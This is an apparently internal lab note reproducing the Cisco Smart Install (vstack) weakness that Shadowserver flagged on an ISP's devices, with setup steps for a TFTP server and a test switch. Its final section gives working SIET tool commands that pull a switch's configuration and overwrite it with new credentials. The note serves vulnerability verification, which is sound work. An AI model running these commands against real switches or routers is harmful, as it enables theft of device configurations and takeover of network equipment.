SIET Cisco smart install vulnerability

• Cisco smart install vstack compromise which affects listed hosts as notified by Shadow Server, written up here:

• 2016.zeronights.ru/wp-content/uploads/2016/12/CiscoSmartInstall.v3.pdf

• The Dmitry Kuznetsov exploit attack works against a switch or router with standard setting vstack enabled for TFTP config load from a director switch or router informing it of a tftp server. It works over TCP port 4786.
• Shadowserver send ISPs a feed of affected institutions, some external facing routers, some internal routers or switches. Incident number was #1615253 and others created Wed Dec 06 and titled 'potentially vulnerable Cisco devices in your network'

Steps to reproduce

Server

• Setup a tftp-server on vili.

• Setup the /etc/xinetd.d/tftp file to allow for new files to be written: server_args = -c -p -s -v /tftpboot

• n.b. without -c creation of new files is not possible and tftp fails to retrieve config.
• Enable firewall-cmd settings for tftp port 69.
• setup second interface to private 192.168.0.1 network.

• run git clone https://github.com/Sab0tag3d/SIET

Switch

• Power up a cisco switch (catalyst 3560) with ios version 12.2 or above.
• Connect a console cable from switch to vili usb port.
• Connect Vili interface #2 to cisco switch port.
• From server use sudo screen /dev/ttyUSB0 9600 to open a terminal connection to switch.
• Set the switch vlan 1 with a class C private address i.e. 192.168.0.2
• Check vstack is running.

• one edit made was to run: ip tftp source-interface FastEthernet0/1

• (but this last step shouldn't be necessary as vstack should on a new switch)

Exploit

• STEAL config: from the git directory run #sudo python siet.py -g -i 192.168.0.2

• This will obtain the switch config to ~/SIET/tftp/192.168.0.2.conf

• OVERWRITE config: run #sudo python siet.py -c -i 192.168.0.2 Then hit d for default. Set a username/pass and time before reload.